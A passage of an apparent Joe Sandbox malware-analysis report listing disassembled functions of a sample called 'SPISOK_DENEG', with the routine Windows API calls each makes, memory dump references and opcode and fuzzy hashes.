                                                            • Opcode Fuzzy Hash: 260a11f51f42bcf1d35725e8d78a8ece72347899c6e9839f3fc93d2cd263fe9d
                                                            • Instruction Fuzzy Hash: 2801B131300314AAEF61AB758C09BFE328DAF0B780F044417F941E6286D7A8CB81C6B6
                                                            Function 000FB893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 000FB8B8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Info
                                                            • String ID:
                                                            • API String ID: 1807457897-3916222277
                                                            • Opcode ID: 63c8ba075c251e937d08869cca34d719b267a8a332830dcecf492868c9b81786
                                                            • Instruction ID: 02e2f2040352e878f6b509bf1fab3b1e50f63cb73321e27fa3b8f2c9dbcc9e44
                                                            • Opcode Fuzzy Hash: 63c8ba075c251e937d08869cca34d719b267a8a332830dcecf492868c9b81786
                                                            • Instruction Fuzzy Hash: 6341F97050828C9EDB218E64CC84BFABBEDDB45304F1404EDE7DA86542D375AA45EF61
                                                            Function 000FAF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 000FAFDD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: String
                                                            • String ID: LCMapStringEx
                                                            • API String ID: 2568140703-3893581201
                                                            • Opcode ID: 46846d7110f75f1ac94594382097848d823ebc0ae5d91e59f734343242c70271
                                                            • Instruction ID: 39bf61cc26411e7d18351dbcd38b2578b26046bd90e4af0a592d127834ae3663
                                                            • Opcode Fuzzy Hash: 46846d7110f75f1ac94594382097848d823ebc0ae5d91e59f734343242c70271
                                                            • Instruction Fuzzy Hash: FD01487260420DBBCF029F90DC06DEE7FA6EF09764F014154FE18261A1CB729A71EB91
                                                            Function 000FAF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,000FA56F), ref: 000FAF55
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: CountCriticalInitializeSectionSpin
                                                            • String ID: InitializeCriticalSectionEx
                                                            • API String ID: 2593887523-3084827643
                                                            • Opcode ID: c21aba7bf0e28cbe727873d723a4e2bb58113b86d4b137f2f1df6e831cfac9a8
                                                            • Instruction ID: 8e537f0f24ceebb3d34bcd581241555860dfbb76ea408e66a37e5ed6b9aa3bee
                                                            • Opcode Fuzzy Hash: c21aba7bf0e28cbe727873d723a4e2bb58113b86d4b137f2f1df6e831cfac9a8
                                                            • Instruction Fuzzy Hash: 2EF0E971A4520CBFCF126F51CC06CAEBFA5EF09721B404064FD185A2A0DBB15E10A7D5
                                                            Function 000FADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Alloc
                                                            • String ID: FlsAlloc
                                                            • API String ID: 2773662609-671089009
                                                            • Opcode ID: c73a2502ac94798f94292c551633673bf5600f9fc2eaaff108073784f878c2af
                                                            • Instruction ID: 436524c2ff0c6f36e827cad2d8d9a8647f2d114f69ed198c69eed5079f87f52a
                                                            • Opcode Fuzzy Hash: c73a2502ac94798f94292c551633673bf5600f9fc2eaaff108073784f878c2af
                                                            • Instruction Fuzzy Hash: 4BE05570B4020C7BC201AB65CC02D7EBB94DB09730B000098F94AA76C0CFF06E4092C6
                                                            Function 000FBBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000FB7BB: GetOEMCP.KERNEL32(00000000,?,?,000FBA44,?), ref: 000FB7E6
                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,000FBA89,?,00000000), ref: 000FBC64
                                                            • GetCPInfo.KERNEL32(00000000,000FBA89,?,?,?,000FBA89,?,00000000), ref: 000FBC77
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: CodeInfoPageValid
                                                            • String ID:
                                                            • API String ID: 546120528-0
                                                            • Opcode ID: a70638be62ce8ad6b9e956e1628ee9224c4df943889917ebb6e40eb96201a98f
                                                            • Instruction ID: 728016beb8ec84259f5d147fda2a8ae44da2f2c968fd2f89b61f53da87d292a8
                                                            • Opcode Fuzzy Hash: a70638be62ce8ad6b9e956e1628ee9224c4df943889917ebb6e40eb96201a98f
                                                            • Instruction Fuzzy Hash: E3515670A0024D9FDB20DF75C8816FBBBE5EF41300F28446ED6968BA52EB349941EF91
                                                            Function 000D9A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,000D9A50,?,?,00000000,?,?,000D8CBC,?), ref: 000D9BAB
                                                            • GetLastError.KERNEL32(?,00000000,000D8411,-00009570,00000000,000007F3), ref: 000D9BB6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: 8c2df3c1184213e39fa437d5c851e5d3ad54abdc526a1e6f1355a75bc7337c01
                                                            • Instruction ID: 8e61c134386ddf3686f9dc8c24cc902dff3c6ffaab62f314ee29041b6e2eb9ea
                                                            • Opcode Fuzzy Hash: 8c2df3c1184213e39fa437d5c851e5d3ad54abdc526a1e6f1355a75bc7337c01
                                                            • Instruction Fuzzy Hash: 5B41CE316043019FDB24DF19E68446AB7E9FFD5320F168A2FE89587361D7B0ED448AB1
                                                            Function 000FBA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F97E5: GetLastError.KERNEL32(?,00111030,000F4674,00111030,?,?,000F3F73,00000050,?,00111030,00000200), ref: 000F97E9
                                                              • Part of subcall function 000F97E5: _free.LIBCMT ref: 000F981C
                                                              • Part of subcall function 000F97E5: SetLastError.KERNEL32(00000000,?,00111030,00000200), ref: 000F985D
                                                              • Part of subcall function 000F97E5: _abort.LIBCMT ref: 000F9863
                                                              • Part of subcall function 000FBB4E: _abort.LIBCMT ref: 000FBB80
                                                              • Part of subcall function 000FBB4E: _free.LIBCMT ref: 000FBBB4
                                                              • Part of subcall function 000FB7BB: GetOEMCP.KERNEL32(00000000,?,?,000FBA44,?), ref: 000FB7E6
                                                            • _free.LIBCMT ref: 000FBA9F
                                                            • _free.LIBCMT ref: 000FBAD5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorLast_abort
                                                            • String ID:
                                                            • API String ID: 2991157371-0
                                                            • Opcode ID: e09ae227f31cd8f09f97a0214e73c7e3d2c28fba3ac7a12de8d0bd783cb6629f
                                                            • Instruction ID: 5230239b92d967c9c7b03f91c2618449cd0412fe85f91017196ac3f6f27c2655
                                                            • Opcode Fuzzy Hash: e09ae227f31cd8f09f97a0214e73c7e3d2c28fba3ac7a12de8d0bd783cb6629f
                                                            • Instruction Fuzzy Hash: 1531913190420DAFDB10EFA9D441BBDB7F5EF41320F254099EA049BAA2EB765D40EF51
                                                            Function 000D1E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000D1E55
                                                              • Part of subcall function 000D3BBA: __EH_prolog.LIBCMT ref: 000D3BBF
                                                            • _wcslen.LIBCMT ref: 000D1EFD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: H_prolog$_wcslen
                                                            • String ID:
                                                            • API String ID: 2838827086-0
                                                            • Opcode ID: f5724d84a3a24f416706fc94f6a245e35944ae1aa66ef242c5799f07182b9595
                                                            • Instruction ID: 4fca1e776d7a5d9684e79afd4b0b61e0c27390ed447dba961170d185d8233bf3
                                                            • Opcode Fuzzy Hash: f5724d84a3a24f416706fc94f6a245e35944ae1aa66ef242c5799f07182b9595
                                                            • Instruction Fuzzy Hash: A5312871904209AFCF15DF99C945AEEBBF6AF48310F2040AAE845B7352CB325E51DB60
                                                            Function 000D9DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,000D73BC,?,?,?,00000000), ref: 000D9DBC
                                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 000D9E70
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: File$BuffersFlushTime
                                                            • String ID:
                                                            • API String ID: 1392018926-0
                                                            • Opcode ID: ad15d2ff4434cfea263dccd688870187a2d3beb055d1d2de58cc44b390847d06
                                                            • Instruction ID: eb5acc48636117b1aed95dbba8ac583d4b9c60c37f5b2292b4d1c9292503f360
                                                            • Opcode Fuzzy Hash: ad15d2ff4434cfea263dccd688870187a2d3beb055d1d2de58cc44b390847d06
                                                            • Instruction Fuzzy Hash: D321CE31248385AFC714DF35C891AAABBE8AF55304F08491EF4C587681D339EA0CDB61
                                                            Function 000D966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,000D9F27,?,?,000D771A), ref: 000D96E6
                                                            • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,000D9F27,?,?,000D771A), ref: 000D9716
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 60e79a65248b308f2533d40e7875a3d30464ddf92caef2ec96273932e89461b4
                                                            • Instruction ID: a8c59ad53402b8c1bde6662830b35faaa133bf0b8ff0ad26efcb0ea3d1648ccf
                                                            • Opcode Fuzzy Hash: 60e79a65248b308f2533d40e7875a3d30464ddf92caef2ec96273932e89461b4
                                                            • Instruction Fuzzy Hash: 6B21BD71104344AEE3709A65CC89FE7B7DCEB49320F100A1AFAD5C26D2C7B4A8848B31
                                                            Function 000D9E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 000D9EC7
                                                            • GetLastError.KERNEL32 ref: 000D9ED4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: b2682a434d8550961f2221ee7ac5aa75c62a3b38b3f15ee9874bc0c3640cbe59
                                                            • Instruction ID: 1d70a94a7cbb0679afa77d61fd42d23960cda62710a9f612d484a5747e2475cb
                                                            • Opcode Fuzzy Hash: b2682a434d8550961f2221ee7ac5aa75c62a3b38b3f15ee9874bc0c3640cbe59
                                                            • Instruction Fuzzy Hash: AB11E530A00704ABD734C628C840BAAB7E9AB45360F504A2BF563D27D0D7B0ED85C770
                                                            Function 000F8E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 000F8E75
                                                              • Part of subcall function 000F8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,000FCA2C,00000000,?,000F6CBE,?,00000008,?,000F91E0,?,?,?), ref: 000F8E38
                                                            • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00111098,000D17CE,?,?,00000007,?,?,?,000D13D6,?,00000000), ref: 000F8EB1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Heap$AllocAllocate_free
                                                            • String ID:
                                                            • API String ID: 2447670028-0
                                                            • Opcode ID: 446262d484f31ee2488aeb555f413b00f455534b7f73292ede8bb8251d7c354e
                                                            • Instruction ID: eed262b2daf74c7d9be32381c3a58d8089bc60068087dd76c865a94448146bdb
                                                            • Opcode Fuzzy Hash: 446262d484f31ee2488aeb555f413b00f455534b7f73292ede8bb8251d7c354e
                                                            • Instruction Fuzzy Hash: BEF0623260111D66DB712A259C05BFF37989F91B70B25C125FB18A6D92DF70DD00B3A1
                                                            Function 000E109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?,?), ref: 000E10AB
                                                            • GetProcessAffinityMask.KERNEL32(00000000), ref: 000E10B2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Process$AffinityCurrentMask
                                                            • String ID:
                                                            • API String ID: 1231390398-0
                                                            • Opcode ID: ee8390c3147ba168072d9aff45b624ef86bdf9365f0d9d040671ae849e2dcee5
                                                            • Instruction ID: 9a7cc15b313d4a13aa9e2242987b756ab369bdba216244f2b310eefae5496814
                                                            • Opcode Fuzzy Hash: ee8390c3147ba168072d9aff45b624ef86bdf9365f0d9d040671ae849e2dcee5
                                                            • Instruction Fuzzy Hash: 3CE0D832B10189EBCF0987B59C059EBB3DDEB442047104275F413F3501F9B0DE8146A0
                                                            Function 000DA4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,000DA325,?,?,?,000DA175,?,00000001,00000000,?,?), ref: 000DA501
                                                              • Part of subcall function 000DBB03: _wcslen.LIBCMT ref: 000DBB27
                                                            • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,000DA325,?,?,?,000DA175,?,00000001,00000000,?,?), ref: 000DA532
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2673547680-0
                                                            • Opcode ID: 45e6bcbf1058222f16a27f6fd22d7e97f724ceac62d1f67b0ed39139c8dbb5f5
                                                            • Instruction ID: 5f4951f3340029a2db0cc897553c56cdb21eb3ad3fc3328e2cae56ca99cccf4d
                                                            • Opcode Fuzzy Hash: 45e6bcbf1058222f16a27f6fd22d7e97f724ceac62d1f67b0ed39139c8dbb5f5
                                                            • Instruction Fuzzy Hash: BDF06532240249BBDF015F60DC45FDA37ACAF053C5F448052B945D5265DB71DAD9DB60
                                                            Function 000DA1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DeleteFileW.KERNELBASE(000000FF,?,?,000D977F,?,?,000D95CF,?,?,?,?,?,00102641,000000FF), ref: 000DA1F1
                                                              • Part of subcall function 000DBB03: _wcslen.LIBCMT ref: 000DBB27
                                                            • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,000D977F,?,?,000D95CF,?,?,?,?,?,00102641), ref: 000DA21F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: DeleteFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2643169976-0
                                                            • Opcode ID: 5c1eeb3b4c856926ef19799f1600294a7fc0628d8b82589a2060d104a9c96c5a
                                                            • Instruction ID: 2847bed47834e7b443ede5db41609e6d9bdddd181cfc75126fc1da90056549a8
                                                            • Opcode Fuzzy Hash: 5c1eeb3b4c856926ef19799f1600294a7fc0628d8b82589a2060d104a9c96c5a
                                                            • Instruction Fuzzy Hash: 3DE0D8312403097BDB015F65DC45FEA379CAF0D3C1F484022B944D2155EBB1DEC4DA64
                                                            Function 000EAC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GdiplusShutdown.GDIPLUS(?,?,?,?,00102641,000000FF), ref: 000EACB0
                                                            • CoUninitialize.COMBASE(?,?,?,?,00102641,000000FF), ref: 000EACB5
                                                            Memory Dump Source
